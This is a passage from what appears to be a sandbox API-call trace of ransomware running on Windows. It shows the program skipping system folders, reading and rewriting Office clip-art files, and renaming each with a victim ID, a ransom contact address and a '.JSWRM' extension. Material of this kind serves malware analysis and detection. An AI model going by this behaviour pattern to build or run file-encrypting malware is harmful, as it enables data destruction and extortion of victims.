hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7016) returned 1 [0082.779] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b60) returned 0x205850 [0082.779] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b60, lpOverlapped=0x0) returned 1 [0082.781] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.781] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b60, lpOverlapped=0x0) returned 1 [0082.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.782] CloseHandle (hObject=0x314) returned 1 [0082.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0082.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0082.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0082.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0082.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0082.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.782] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0082.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.783] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1574, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107728.WMF", cAlternateFileName="")) returned 1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2=".") returned 1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="..") returned 1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="...") returned 1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="windows") returned -1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="recovery") returned -1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="perflogs") returned -1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="documents and settings") returned 1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="system volume information") returned -1 [0082.783] lstrcmpiW (lpString1="J0107728.WMF", lpString2="msocache") returned -1 [0082.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0082.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107728.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107728.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107728.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0082.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0082.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107728.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107728.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107728.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0082.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.784] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5492) returned 1 [0082.784] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1570) returned 0x205850 [0082.784] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1570, lpOverlapped=0x0) returned 1 [0082.786] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.786] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1570, lpOverlapped=0x0) returned 1 [0082.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.786] CloseHandle (hObject=0x314) returned 1 [0082.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0082.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0082.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0082.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0082.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0082.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0082.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.787] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbf4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107730.WMF", cAlternateFileName="")) returned 1 [0082.787] lstrcmpiW (lpString1="J0107730.WMF", lpString2=".") returned 1 [0082.787] lstrcmpiW (lpString1="J0107730.WMF", lpString2="..") returned 1 [0082.787] lstrcmpiW (lpString1="J0107730.WMF", lpString2="...") returned 1 [0082.787] lstrcmpiW (lpString1="J0107730.WMF", lpString2="windows") returned -1 [0082.787] lstrcmpiW (lpString1="J0107730.WMF", lpString2="recovery") returned -1 [0082.788] lstrcmpiW (lpString1="J0107730.WMF", lpString2="perflogs") returned -1 [0082.788] lstrcmpiW (lpString1="J0107730.WMF", lpString2="documents and settings") returned 1 [0082.788] lstrcmpiW (lpString1="J0107730.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.788] lstrcmpiW (lpString1="J0107730.WMF", lpString2="system volume information") returned -1 [0082.788] lstrcmpiW (lpString1="J0107730.WMF", lpString2="msocache") returned -1 [0082.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0082.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107730.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107730.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107730.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0082.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107730.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107730.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107730.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0082.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0082.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.788] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3060) returned 1 [0082.788] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbf0) returned 0x23fc98 [0082.789] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xbf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xbf0, lpOverlapped=0x0) returned 1 [0082.790] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.790] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbf0, lpOverlapped=0x0) returned 1 [0082.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.790] CloseHandle (hObject=0x314) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0082.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0082.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0082.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0082.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0082.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0082.791] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107734.WMF", cAlternateFileName="")) returned 1 [0082.791] lstrcmpiW (lpString1="J0107734.WMF", lpString2=".") returned 1 [0082.791] lstrcmpiW (lpString1="J0107734.WMF", lpString2="..") returned 1 [0082.791] lstrcmpiW (lpString1="J0107734.WMF", lpString2="...") returned 1 [0082.791] lstrcmpiW (lpString1="J0107734.WMF", lpString2="windows") returned -1 [0082.791] lstrcmpiW (lpString1="J0107734.WMF", lpString2="recovery") returned -1 [0082.791] lstrcmpiW (lpString1="J0107734.WMF", lpString2="perflogs") returned -1 [0082.792] lstrcmpiW (lpString1="J0107734.WMF", lpString2="documents and settings") returned 1 [0082.792] lstrcmpiW (lpString1="J0107734.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.792] lstrcmpiW (lpString1="J0107734.WMF", lpString2="system volume information") returned -1 [0082.792] lstrcmpiW (lpString1="J0107734.WMF", lpString2="msocache") returned -1 [0082.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0082.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107734.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107734.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107734.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0082.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107734.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107734.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107734.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.793] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3140) returned 1 [0082.793] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc40) returned 0x23fc98 [0082.793] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0082.794] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.795] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0082.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.795] CloseHandle (hObject=0x314) returned 1 [0082.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.795] RtlAllocateHeap (HeapHandle=0x1e0000, 